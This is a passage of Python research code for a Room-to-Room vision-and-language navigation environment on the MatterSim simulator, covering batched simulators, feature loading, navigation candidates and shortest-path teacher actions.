for i, idx in enumerate(perm_idx):
action = a_t[i]
if action != -1: # -1 is the <stop> action
select_candidate = perm_obs[i]['candidate'][action]
src_point = perm_obs[i]['viewIndex']
trg_point = select_candidate['pointId']
src_level = (src_point ) // 12  # view indices start at 0; 12 heading slots per elevation level
trg_level = (trg_point ) // 12
self.qin[idx].put(('act',(select_candidate, src_point, trg_point, src_level, trg_level)))
for i, idx in enumerate(perm_idx):
action = a_t[i]
if action != -1:
if traj is not None:
res = self.qtraj[idx].get()  # queues are indexed by simulator id, matching the put above
traj[i]['path'] += res
scanId, viewpointId, heading, elevation = self.qout[idx].get()
# idx = perm_idx[i]
# self.sims[idx].newEpisode(scanId, viewpointId, heading, elevation)
self.feature_states = self._getStates()
def copystate(self, env):
for i, sim in enumerate(self.sims):
state = env.sims[i].getState()
scanId = state.scanId
viewpointId = state.location.viewpointId
heading = state.heading
elevation = state.elevation
sim.newEpisode(scanId, viewpointId, heading, elevation)
def copyinstance(self):
env = EnvBatch(self.features, len(self.sims))
for i, sim in enumerate(env.sims):
state = self.sims[i].getState()
scanId = state.scanId
viewpointId = state.location.viewpointId
heading = state.heading
elevation = state.elevation
sim.newEpisode(scanId, viewpointId, heading, elevation)
return env
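# A minimal usage sketch for the thread-backed EnvBatch_T above. Illustrative only:
# `features` is assumed to be an already-loaded {scanId_viewpointId: ndarray} dict,
# and the scan / viewpoint ids below are placeholders, not real Matterport ids.
def _envbatch_t_usage_sketch(features):
    env = EnvBatch_T(feature_store=features, batch_size=2)
    # Start one episode per simulator (headings are given in radians).
    env.newEpisodes(['scan_a', 'scan_b'], ['vp_0', 'vp_1'], [0.0, math.pi / 2])
    for feat, state in env.getStates():
        # feat is the precomputed per-view feature matrix, state the simulator state.
        print(state.scanId, state.location.viewpointId, state.viewIndex)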
class EnvBatchRGB():
''' A simple wrapper for a batch of MatterSim environments,
using discretized viewpoints and pretrained features '''
def __init__(self, batch_size=100):
"""
Init the simulators for rendering RGB frames; no precomputed image features are loaded.
:param batch_size: Used to create the simulator list.
"""
self.features = None
self.image_w = 320
self.image_h = 320
self.vfov = 60
# self.featurized_scans = set([key.split("_")[0] for key in list(self.features.keys())])
self.sims = []
for i in range(batch_size):
sim = MatterSim.Simulator()
# sim.setRenderingEnabled(True)
sim.setDiscretizedViewingAngles(True)   # 30-degree increments/decrements (otherwise angles are in radians)
sim.setCameraResolution(self.image_w, self.image_h)
sim.setCameraVFOV(math.radians(self.vfov))
sim.init()
self.sims.append(sim)
print('EnvBatchRGB: %d simulators initialised' % batch_size)
def _make_id(self, scanId, viewpointId):
return scanId + '_' + viewpointId
def newEpisodes(self, scanIds, viewpointIds, headings):
for i, (scanId, viewpointId, heading) in enumerate(zip(scanIds, viewpointIds, headings)):
# print("New episode %d" % i)
# sys.stdout.flush()
self.sims[i].newEpisode(scanId, viewpointId, heading, 0)
def getStates(self):
"""
Get the list of simulator states; since this class loads no features, the feature slot is None.
Agent's current view [0-35] (set only when viewing angles are discretized)
[0-11] looking down, [12-23] looking at horizon, [24-35] looking up
:return: [ (None, sim_state) ] * batch_size
"""
feature_states = []
for i, sim in enumerate(self.sims):
state = sim.getState()
long_id = self._make_id(state.scanId, state.location.viewpointId)
if self.features:
feature = self.features[long_id]     # Get the precomputed feature for this viewpoint
feature_states.append((feature, state))
else:
feature_states.append((None, state))
return feature_states
def getRGB(self):
"""
Return the current rendered frame from each simulator as an RGB uint8 array (channels reordered from BGR).
"""
rgb_list = []
for i, sim in enumerate(self.sims):
state = sim.getState()
img = Image.fromarray(np.array(state.rgb).astype(np.uint8))
img = np.array(img)
img = img[...,[2,1,0]]
rgb_list.append(img)
return rgb_list
def makeActions(self, actions):
''' Take an action using the full state dependent action interface (with batched input).
Every action element should be an (index, heading, elevation) tuple. '''
for i, (index, heading, elevation) in enumerate(actions):
self.sims[i].makeAction(index, heading, elevation)
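# A rough sketch of grabbing rendered frames with EnvBatchRGB. Illustrative only: it
# assumes rendering is enabled on the simulators (the setRenderingEnabled(True) call
# above is commented out) and uses placeholder scan / viewpoint ids.
def _envbatch_rgb_sketch():
    env = EnvBatchRGB(batch_size=1)
    env.newEpisodes(['scan_a'], ['vp_0'], [0.0])   # placeholder ids; heading in radians
    frame = env.getRGB()[0]                        # HxWx3 uint8 array, channels reordered BGR -> RGB
    Image.fromarray(frame).save('view.png')        # save the first simulator's current view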
class EnvBatchGraph():
''' A simple wrapper for a batch of MatterSim environments,
using discretized viewpoints and pretrained features '''
def __init__(self, feature_store=None, batch_size=100):
"""
1. Load pretrained image feature
2. Init the Simulator.
:param feature_store: The path of the file storing the features, or an already-loaded feature dict.
:param batch_size: Used to create the simulator list.
"""
if feature_store:
if type(feature_store) is dict:    # reuse an already-loaded feature dict instead of re-reading the file
self.features = feature_store
self.image_w = 640
self.image_h = 480
self.vfov = 60
self.feature_size = next(iter(self.features.values())).shape[-1]
print('The feature size is %d' % self.feature_size)
else:
print('Image features not provided')
self.features = None
self.image_w = 640
self.image_h = 480
self.vfov = 60
self.featurized_scans = set([key.split("_")[0] for key in list(self.features.keys())])
self.sims = []
for i in range(batch_size):
sim = MatterSim.Simulator()
sim.setRenderingEnabled(False)
sim.setDiscretizedViewingAngles(True)   # 30-degree increments/decrements (otherwise angles are in radians)
sim.setCameraResolution(self.image_w, self.image_h)
sim.setCameraVFOV(math.radians(self.vfov))
sim.init()
self.sims.append(sim)
def _make_id(self, scanId, viewpointId, angleId):
return scanId + '_' + viewpointId + '_' + angleId
def newEpisodes(self, scanIds, viewpointIds, headings):
for i, (scanId, viewpointId, heading) in enumerate(zip(scanIds, viewpointIds, headings)):
# print("New episode %d" % i)
# sys.stdout.flush()
self.sims[i].newEpisode(scanId, viewpointId, heading, 0)
def getStates(self):
"""
Get list of states augmented with precomputed image features. rgb field will be empty.
Agent's current view [0-35] (set only when viewing angles are discretized)
[0-11] looking down, [12-23] looking at horizon, [24-35] looking up
:return: [([64,2051]*36, sim_state)] * batch_size
"""
feature_states = []
for i, sim in enumerate(self.sims):
state = sim.getState()
features = []
for j in range(36):
long_id = self._make_id(state.scanId, state.location.viewpointId,str(j+1))
feature = self.features[long_id]
pad_num = 64-len(feature)
if pad_num > 0: # padding the feature to [64, 2051]
padding = np.zeros([pad_num, 2051])
feature = np.concatenate((feature,padding))
features.append(feature)
feature_states.append((features, state))
# if self.features:
# feature = self.features[long_id] # Get feature for
# feature_states.append((feature, state))
# else:
# feature_states.append((None, state))
return feature_states # [([64,2051]*36), sim_state] * batch_size
def makeActions(self, actions):
''' Take an action using the full state dependent action interface (with batched input).
Every action element should be an (index, heading, elevation) tuple. '''
for i, (index, heading, elevation) in enumerate(actions):
self.sims[i].makeAction(index, heading, elevation)
class R2RBatch():
''' Implements the Room to Room navigation task, using discretized viewpoints and pretrained features '''
def __init__(self, feature_store, batch_size=100, seed=10, splits=['train'], tokenizer=None,
name=None, record_scans=None):
if feature_store is None:
return
self.env = EnvBatch(feature_store=feature_store, batch_size=batch_size)
if feature_store:
self.feature_size = self.env.feature_size
self.data = []
if tokenizer:
self.tok = tokenizer
scans = []
if splits is not None:
for split in splits:
for item in load_datasets([split]):
# Split multiple instructions into separate entries
if item['instructions'] == '':
new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], 0)
new_item['instructions'] = ''
self.data.append(new_item)
scans.append(item['scan'])
else:
for j,instr in enumerate(item['instructions']):
if item['scan'] not in self.env.featurized_scans: # For fast training
continue
new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], j)
new_item['instructions'] = instr
if 'seg' in item:
if str(j) in item['seg']:
# print(j)
new_item['seg'] = item['seg'][str(j)]
else:
continue
if tokenizer:
new_item['instr_encoding'] = tokenizer.encode_sentence(instr)
if not tokenizer or new_item['instr_encoding'] is not None:  # Drop items whose instructions failed to encode
self.data.append(new_item)
scans.append(item['scan'])
if name is None:
self.name = splits[0] if len(splits) > 0 else "FAKE"
else:
self.name = name
if record_scans is not None:
scans = record_scans
self.scans = set(scans)
self.splits = splits
self.seed = seed
random.seed(self.seed)
random.shuffle(self.data)
self.ix = 0
self.batch_size = batch_size
self._load_nav_graphs()
self.angle_feature = utils.get_all_point_angle_feature()
self.sim = utils.new_simulator()
self.buffered_state_dict = {}
self.buffered_state_dict_detail = {}
self.batch = None
# In the supervised setup the fake data is identical to the real data
self.fake_data = self.data
if splits is not None:
print('R2RBatch loaded with %d instructions, using splits: %s' % (len(self.data), ",".join(splits)))
def split(self, num):
sub_batch_size = int(self.env.batch_size / num)
sub_envs = []
n = list([int(len(self.data) * 1.0 * i / num) for i in range(num+1)])
data_split = []
for i in range(num):
data_split.append(self.data[n[i]:n[i+1]])
# [self.data[n[i]:n[i+1]] for i in range(num)]
feature_store = self.env.features
for i in range(num):
env = R2RBatch(feature_store, sub_batch_size, seed= self.seed, splits=None, tokenizer=self.tok, name=self.name)
env.data = data_split[i]
env.scans = self.scans
sub_envs.append(env)
return sub_envs
def copystate(self, env):
self.env.copystate(env.env)
for name, value in vars(env).items():
if name != 'env':
setattr(self,name,value)
def copyinstance(self):
env_copy = R2RBatch(None)
for name, value in vars(self).items():
if name != 'env':
setattr(env_copy,name,value)
setattr(env_copy,'env',self.env.copyinstance())
return env_copy
def size(self):
return len(self.data)
def _load_nav_graphs(self):
"""
Load the navigation graph for each scan in self.scans.
Store the graph {scan_id: graph} in self.graphs
Store the shortest path {scan_id: {view_id_x: {view_id_y: [path]} } } in self.paths
Store the distances in self.distances. (Structure see above)
Load connectivity graph for each scan, useful for reasoning about shortest paths
:return: None
"""
# print('Loading navigation graphs for %d scans' % len(self.scans))
self.graphs = load_nav_graphs(self.scans)
self.paths = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.paths[scan] = dict(nx.all_pairs_dijkstra_path(G))
self.distances = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G))
def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):
"""
Store the minibatch in 'self.batch'
:param tile_one: Tile the one into batch_size
:return: None
"""
if batch_size is None:
batch_size = self.batch_size
if tile_one:
batch = [self.data[self.ix]] * batch_size
self.ix += 1
if self.ix >= len(self.data):
random.shuffle(self.data)
self.ix -= len(self.data)
else:
batch = self.data[self.ix: self.ix+batch_size]
if len(batch) < batch_size:
random.shuffle(self.data)
self.ix = batch_size - len(batch)
batch += self.data[:self.ix]
else:
self.ix += batch_size
self.batch = batch
def reset_epoch(self, shuffle=False):
''' Reset the data index to beginning of epoch. Primarily for testing.
You must still call reset() for a new episode. '''
# if shuffle:
# random.shuffle(self.data)
self.ix = 0
def _shortest_path_action(self, state, goalViewpointId):
''' Determine next action on the shortest path to goal, for supervised training. '''
if state.location.viewpointId == goalViewpointId:
return goalViewpointId # Just stop here
path = self.paths[state.scanId][state.location.viewpointId][goalViewpointId]
nextViewpointId = path[1]
return nextViewpointId
# @profile
def make_candidate(self, feature, scanId, viewpointId, viewId):
def _loc_distance(loc):
return np.sqrt(loc.rel_heading ** 2 + loc.rel_elevation ** 2)
base_heading = (viewId % 12) * math.radians(30)
adj_dict = {}
long_id = "%s_%s" % (scanId, viewpointId)
long_id_detail = '%s_%s'%(long_id, viewId)
if long_id not in self.buffered_state_dict:
for ix in range(36):
if ix == 0:
self.sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
self.sim.makeAction(0, 1.0, 1.0)
else:
self.sim.makeAction(0, 1.0, 0)
state = self.sim.getState()
assert state.viewIndex == ix
# Heading and elevation for the viewpoint center
heading = state.heading - base_heading
elevation = state.elevation
visual_feat = feature[ix]
# get adjacent locations
for j, loc in enumerate(state.navigableLocations[1:]):
# if a loc is visible from multiple views, use the closest
# view (in angular distance) as its representation
distance = _loc_distance(loc)
# Heading and elevation for the loc
loc_heading = heading + loc.rel_heading
loc_elevation = elevation + loc.rel_elevation
angle_feat = utils.angle_feature(loc_heading, loc_elevation)
if (loc.viewpointId not in adj_dict or
distance < adj_dict[loc.viewpointId]['distance']):
adj_dict[loc.viewpointId] = {
'heading': loc_heading,
'elevation': loc_elevation,
"normalized_heading": state.heading + loc.rel_heading,
'scanId':scanId,
'viewpointId': loc.viewpointId, # Next viewpoint id
'pointId': ix,
'distance': distance,
'idx': j + 1,
'feature': np.concatenate((visual_feat, angle_feat), -1)
}
candidate = list(adj_dict.values())
self.buffered_state_dict[long_id] = [
{key: c[key]
for key in
['normalized_heading', 'elevation', 'scanId', 'viewpointId',
'pointId', 'idx']}
for c in candidate
]
self.buffered_state_dict_detail[long_id_detail] = [
{key: c[key]
for key in
['normalized_heading', 'elevation', 'scanId', 'viewpointId',
'pointId', 'idx','heading','feature']}
for c in candidate
]
return candidate
elif long_id_detail not in self.buffered_state_dict_detail:
candidate = self.buffered_state_dict[long_id]
candidate_new = []
for c in candidate:
c_new = c.copy()
ix = c_new['pointId']
normalized_heading = c_new['normalized_heading']
visual_feat = feature[ix]
loc_heading = normalized_heading - base_heading
c_new['heading'] = loc_heading
angle_feat = utils.angle_feature(c_new['heading'], c_new['elevation'])
c_new['feature'] = np.concatenate((visual_feat, angle_feat), -1)
# c_new.pop('normalized_heading')
candidate_new.append(c_new)
self.buffered_state_dict_detail[long_id_detail] = [
{key: c[key]
for key in
['normalized_heading', 'elevation', 'scanId', 'viewpointId',
'pointId', 'idx','heading','feature']}
for c in candidate_new
]
return candidate_new
else:
return self.buffered_state_dict_detail[long_id_detail]
# @profile
def _get_obs(self):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
item = self.batch[i]
base_view_id = state.viewIndex
# print('in 1')
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
# print('in 2')
# (visual_feature, angle_feature) for views
feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
obs.append({
'instr_id' : item['instr_id'],
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature,
'candidate': candidate,
'navigableLocations' : state.navigableLocations,
'instructions' : item['instructions'],
'teacher' : self._shortest_path_action(state, item['path'][-1]),
'path_id' : item['path_id'],
'seg': item['seg'] if 'seg' in item else None
})
if 'instr_encoding' in item:
obs[-1]['instr_encoding'] = item['instr_encoding']
# A2C reward. The negative distance between the state and the final state
obs[-1]['distance'] = self.distances[state.scanId][state.location.viewpointId][item['path'][-1]]
# print('in 3')
return obs
def _get_obs_fake(self,dest):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
base_view_id = state.viewIndex
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
# (visual_feature, angle_feature) for views
feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
obs.append({
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature,
'candidate': candidate,
'navigableLocations' : state.navigableLocations,
'teacher' : self._shortest_path_action(state, dest),
})
return obs
def _get_path_length(self):
length = []
for item in self.batch:
path = self.paths[item['scan']][item['path'][0]][item['path'][-1]]
length.append(len(path))
return length
def _get_progress(self, obs):
res = []
vps = [ob['viewpoint'] for ob in obs]
for i, item in enumerate(self.batch):
v = vps[i]
a = len(self.paths[item['scan']][item['path'][0]][v])
b = len(self.paths[item['scan']][v][item['path'][-1]])
res.append(1.0*a/(a+b-1))
return np.array(res)
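# Worked example for _get_progress (hypothetical numbers): if the shortest path from the
# start to the current viewpoint has a = 3 nodes and from the current viewpoint to the
# goal has b = 4 nodes, progress = a / (a + b - 1) = 3 / 6 = 0.5, since the current
# viewpoint is counted in both sub-paths.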
def reset(self, batch=None, inject=False, **kwargs):
''' Load a new minibatch / episodes. '''
if batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
else:
if inject: # Inject the batch into the next minibatch
self._next_minibatch(**kwargs)
self.batch[:len(batch)] = batch
else: # Else set the batch to the current batch
self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def reset_fake(self, batch=None, inject=False, **kwargs):
# ''' Load a new minibatch / episodes. '''
if self.batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
# else:
# if inject: # Inject the batch into the next minibatch
# self._next_minibatch(**kwargs)
# self.batch[:len(batch)] = batch
# else: # Else set the batch to the current batch
# self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def step(self, actions):
''' Take action (same interface as makeActions) '''
self.env.makeActions(actions)
return self._get_obs()
def get_statistics(self):
stats = {}
length = 0
path = 0
for datum in self.data:
length += len(self.tok.split_sentence(datum['instructions']))
path += self.distances[datum['scan']][datum['path'][0]][datum['path'][-1]]
stats['length'] = length / len(self.data)
stats['path'] = path / len(self.data)
return stats
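# A minimal sketch of inspecting R2RBatch observations. Purely illustrative: `features`
# and `tok` are assumed to be a pre-loaded feature dict and a tokenizer instance, and the
# dataset splits must be available on disk for load_datasets to succeed.
def _r2rbatch_obs_sketch(features, tok):
    env = R2RBatch(features, batch_size=2, splits=['train'], tokenizer=tok)
    obs = env.reset()   # start new episodes and return one observation per batch item
    for ob in obs:
        # Each observation pairs an instruction with the panoramic features, the
        # navigable candidates, and the shortest-path teacher viewpoint.
        print(ob['instr_id'], ob['scan'], ob['viewpoint'], ob['teacher'], len(ob['candidate']))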
class R2RBatch_preload():
''' Implements the Room to Room navigation task, using discretized viewpoints and pretrained features '''
def __init__(self, feature_store, batch_size=100, seed=10, splits=['train'], tokenizer=None,
name=None):
if feature_store is None:
return
self.env = EnvBatch(feature_store=feature_store, batch_size=batch_size)
if feature_store:
self.feature_size = self.env.feature_size
self.data = []
if tokenizer:
self.tok = tokenizer
scans = []
for split in splits:
for item in load_datasets([split]):
# Split multiple instructions into separate entries
for j,instr in enumerate(item['instructions']):
if item['scan'] not in self.env.featurized_scans: # For fast training
continue
new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], j)
new_item['instructions'] = instr
if tokenizer:
new_item['instr_encoding'] = tokenizer.encode_sentence(instr)
if not tokenizer or new_item['instr_encoding'] is not None:  # Drop items whose instructions failed to encode
self.data.append(new_item)
scans.append(item['scan'])
if name is None:
self.name = splits[0] if len(splits) > 0 else "FAKE"
else:
self.name = name
self.scans = set(scans)
self.splits = splits
self.seed = seed
random.seed(self.seed)
random.shuffle(self.data)
self.q = queue.Queue(1)
self.ix = 0
self.batch_size = batch_size
self._load_nav_graphs()
self.angle_feature = utils.get_all_point_angle_feature()
self.sim = utils.new_simulator()
self.buffered_state_dict = {}
self.batch = None
# In the supervised setup the fake data is identical to the real data
self.fake_data = self.data
print('R2RBatch loaded with %d instructions, using splits: %s' % (len(self.data), ",".join(splits)))
def fetch_data():
while True:
batch = self._getbatch()
self.q.put(batch)
# print('finish')
self.th = threading.Thread(target=fetch_data, daemon=True)  # daemon so the prefetch thread does not block interpreter exit
self.th.start()
self.one_batch = None
def copystate(self, env):
self.env.copystate(env.env)
for name, value in vars(env).items():
if name != 'env':
setattr(self,name,value)
def copyinstance(self):
env_copy = R2RBatch(None)
for name, value in vars(self).items():
if name != 'env':
setattr(env_copy,name,value)
setattr(env_copy,'env',self.env.copyinstance())
return env_copy
def size(self):
return len(self.data)
def _load_nav_graphs(self):
"""
Load the navigation graph for each scan in self.scans.
Store the graph {scan_id: graph} in self.graphs
Store the shortest path {scan_id: {view_id_x: {view_id_y: [path]} } } in self.paths
Store the distances in self.distances. (Structure see above)
Load connectivity graph for each scan, useful for reasoning about shortest paths
:return: None
"""
print('Loading navigation graphs for %d scans' % len(self.scans))
self.graphs = load_nav_graphs(self.scans)
self.paths = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.paths[scan] = dict(nx.all_pairs_dijkstra_path(G))
self.distances = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G))
def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):
"""
Store the minibatch in 'self.batch'
:param tile_one: Tile the one into batch_size
:return: None
"""
if batch_size is None:
batch_size = self.batch_size
if tile_one:
batch = [self.data[self.ix]] * batch_size
self.ix += 1
if self.ix >= len(self.data):
random.shuffle(self.data)
self.ix -= len(self.data)
else:
batch = self.data[self.ix: self.ix+batch_size]
if len(batch) < batch_size:
random.shuffle(self.data)
self.ix = batch_size - len(batch)
batch += self.data[:self.ix]
else:
self.ix += batch_size
self.batch = batch
def reset_epoch(self, shuffle=False):
''' Reset the data index to beginning of epoch. Primarily for testing.
You must still call reset() for a new episode. '''
# if shuffle:
# random.shuffle(self.data)
self.ix = 0
def _shortest_path_action(self, state, goalViewpointId):
''' Determine next action on the shortest path to goal, for supervised training. '''
if state.location.viewpointId == goalViewpointId:
return goalViewpointId # Just stop here
# print(state.scanId, state.location.viewpointId, goalViewpointId)
# if not goalViewpointId in self.paths[state.scanId][state.location.viewpointId]:
# print(state.scanId, state.location.viewpointId, goalViewpointId, item)
path = self.paths[state.scanId][state.location.viewpointId][goalViewpointId]
nextViewpointId = path[1]
return nextViewpointId
def make_candidate(self, feature, scanId, viewpointId, viewId):
def _loc_distance(loc):
return np.sqrt(loc.rel_heading ** 2 + loc.rel_elevation ** 2)
base_heading = (viewId % 12) * math.radians(30)
adj_dict = {}
long_id = "%s_%s" % (scanId, viewpointId)
if long_id not in self.buffered_state_dict:
for ix in range(36):
if ix == 0:
self.sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
self.sim.makeAction(0, 1.0, 1.0)
else:
self.sim.makeAction(0, 1.0, 0)
state = self.sim.getState()
assert state.viewIndex == ix
# Heading and elevation for the viewpoint center
heading = state.heading - base_heading
elevation = state.elevation
visual_feat = feature[ix]
# get adjacent locations
for j, loc in enumerate(state.navigableLocations[1:]):
# if a loc is visible from multiple views, use the closest
# view (in angular distance) as its representation
distance = _loc_distance(loc)
# Heading and elevation for the loc
loc_heading = heading + loc.rel_heading
loc_elevation = elevation + loc.rel_elevation
angle_feat = utils.angle_feature(loc_heading, loc_elevation)
if (loc.viewpointId not in adj_dict or
distance < adj_dict[loc.viewpointId]['distance']):
adj_dict[loc.viewpointId] = {
'heading': loc_heading,
'elevation': loc_elevation,
"normalized_heading": state.heading + loc.rel_heading,
'scanId':scanId,
'viewpointId': loc.viewpointId, # Next viewpoint id
'pointId': ix,
'distance': distance,
'idx': j + 1,
'feature': np.concatenate((visual_feat, angle_feat), -1)
}
candidate = list(adj_dict.values())
self.buffered_state_dict[long_id] = [
{key: c[key]
for key in
['normalized_heading', 'elevation', 'scanId', 'viewpointId',
'pointId', 'idx']}
for c in candidate
]
return candidate
else:
candidate = self.buffered_state_dict[long_id]
candidate_new = []
for c in candidate:
c_new = c.copy()
ix = c_new['pointId']
normalized_heading = c_new['normalized_heading']
visual_feat = feature[ix]
loc_heading = normalized_heading - base_heading
c_new['heading'] = loc_heading
angle_feat = utils.angle_feature(c_new['heading'], c_new['elevation'])
c_new['feature'] = np.concatenate((visual_feat, angle_feat), -1)
c_new.pop('normalized_heading')
candidate_new.append(c_new)
return candidate_new
def _get_obs(self):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
item = self.batch[i]
base_view_id = state.viewIndex
if item['scan'] != state.scanId:
scans_a = [state[1].scanId for state in self.env.getStates()]
scans_b = [item['scan'] for item in self.batch]
scans_ab = [(a,b) for a,b in zip(scans_a,scans_b)]
print(scans_ab)
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
# (visual_feature, angle_feature) for views
feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
obs.append({
'instr_id' : item['instr_id'],
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature,
'candidate': candidate,
'navigableLocations' : state.navigableLocations,
'instructions' : item['instructions'],
'teacher' : self._shortest_path_action(state, item['path'][-1]),
'path_id' : item['path_id']
})
if 'instr_encoding' in item:
obs[-1]['instr_encoding'] = item['instr_encoding']
# A2C reward. The negative distance between the state and the final state
obs[-1]['distance'] = self.distances[state.scanId][state.location.viewpointId][item['path'][-1]]
return obs
def reset(self, batch=None, inject=False, **kwargs):
''' Load a new minibatch / episodes. '''
if batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
else:
if inject: # Inject the batch into the next minibatch
self._next_minibatch(**kwargs)
self.batch[:len(batch)] = batch
else: # Else set the batch to the current batch
self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def reset_fake(self, batch=None, inject=False, **kwargs):
# ''' Load a new minibatch / episodes. '''
if self.batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
# else:
# if inject: # Inject the batch into the next minibatch
# self._next_minibatch(**kwargs)
# self.batch[:len(batch)] = batch
# else: # Else set the batch to the current batch
# self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def step(self, actions):
''' Take action (same interface as makeActions) '''
self.env.makeActions(actions)
return self._get_obs()
def get_statistics(self):
stats = {}
length = 0
path = 0
for datum in self.data:
length += len(self.tok.split_sentence(datum['instructions']))
path += self.distances[datum['scan']][datum['path'][0]][datum['path'][-1]]
stats['length'] = length / len(self.data)
stats['path'] = path / len(self.data)
return stats
def make_equiv_action(self, a_t, perm_obs):
"""
Interface between Panoramic view and Egocentric view
It converts the panoramic-view action a_t into the equivalent egocentric-view actions for the simulator
"""
env_actions = {
'left': (0,-1, 0), # left
'right': (0, 1, 0), # right
'up': (0, 0, 1), # up
'down': (0, 0,-1), # down
'forward': (1, 0, 0), # forward
'<end>': (0, 0, 0), # <end>
'<start>': (0, 0, 0), # <start>
'<ignore>': (0, 0, 0) # <ignore>
}
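# Worked example (hypothetical values): if the agent currently looks at view index 5
# (level 5 // 12 = 0, looking down) and the selected candidate was observed from
# pointId 19 (level 19 // 12 = 1, horizon), the loops below issue one 'up' action,
# then 'right' actions until viewIndex == 19, and finally move forward to the
# candidate's navigableLocations index.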
def take_action(i, idx, name):
if type(name) is int: # Go to the next view
self.env.sims[idx].makeAction(name, 0, 0)
else: # Adjust
self.env.sims[idx].makeAction(*env_actions[name])
perm_idx = range(len(perm_obs))
for i, idx in enumerate(perm_idx):
action = a_t[i]
if action != -1: # -1 is the <stop> action
select_candidate = perm_obs[i]['candidate'][action]
src_point = perm_obs[i]['viewIndex']
trg_point = select_candidate['pointId']
src_level = (src_point ) // 12  # view indices start at 0; 12 heading slots per elevation level
trg_level = (trg_point ) // 12
# print(src_level, trg_level, self.env.sims[idx].getState().viewIndex, trg_point)
while src_level < trg_level: # Tune up
take_action(i, idx, 'up')
src_level += 1
while src_level > trg_level: # Tune down
take_action(i, idx, 'down')
src_level -= 1
# print('yes')
while self.env.sims[idx].getState().viewIndex != trg_point: # Turn right until the target
take_action(i, idx, 'right')
# print(self.env.sims[idx].getState().viewIndex)
assert select_candidate['viewpointId'] == \
self.env.sims[idx].getState().navigableLocations[select_candidate['idx']].viewpointId
take_action(i, idx, select_candidate['idx'])
def _teacher_action(self, obs, ended):
"""
Extract teacher actions into variable.
:param obs: The observation.
:param ended: Whether the action seq is ended
:return:
"""
a = np.zeros(len(obs), dtype=np.int64)
for i, ob in enumerate(obs):
if ended[i]: # Just ignore this index
a[i] = args.ignoreid
else:
for k, candidate in enumerate(ob['candidate']):
if candidate['viewpointId'] == ob['teacher']: # Next view point
a[i] = k
break
else: # Stop here
assert ob['teacher'] == ob['viewpoint'] # The teacher action should be "STAY HERE"
a[i] = len(ob['candidate'])
return a
def _getbatch(self):
obs = np.array(self.reset())
ended = np.array([False] * self.batch_size)  # Indices match permutation of the model, not env
length = 10
obs_list = []
# obs_list.append(obs)
exp_list = []
action_list = []
for t in range(length):
candidate_batch = []
mask_batch = []
scanIds = [ob['scan'] for ob in obs]
viewpoints = [ob['viewpoint'] for ob in obs]
headings = [ob['heading'] for ob in obs]
elevations = [ob['elevation'] for ob in obs]
candidate_leng = [len(ob['candidate']) for ob in obs]
max_length = max(candidate_leng)
for i in range(max_length):
a = np.zeros(len(obs), dtype=np.int64)
mask = np.zeros(len(obs), dtype=np.int64)
for j, ob in enumerate(obs):
if i >= len(ob['candidate']):
a[j] = -1
else:
a[j] = i
mask[j] = 1
self.make_equiv_action(a, obs)
obs_cand = np.array(self._get_obs())
candidate_batch.append(obs_cand)
mask_batch.append(mask)
self.env.newEpisodes(scanIds,viewpoints,headings,elevations)
candidate_batch = np.array(candidate_batch).transpose() # batch x max_cand_length (obs)
mask_batch = np.array(mask_batch).transpose() # batch x max_cand_length (mask)
a_t = self._teacher_action(obs, ended)
obs_list.append(obs)
exp_list.append((candidate_batch, mask_batch))
action_list.append(np.array(a_t))
for i, next_id in enumerate(a_t):
if next_id == candidate_leng[i] or next_id == args.ignoreid: # The last action is <end>
a_t[i] = -1 # Change the <end> and ignore action to -1
if ended.all():
break
self.make_equiv_action(a_t, obs)
obs = np.array(self._get_obs())
ended[:] = np.logical_or(ended, (a_t == -1))
# assert len(obs_list) == len(exp_list)
return obs_list, exp_list, action_list
def getbatch(self):
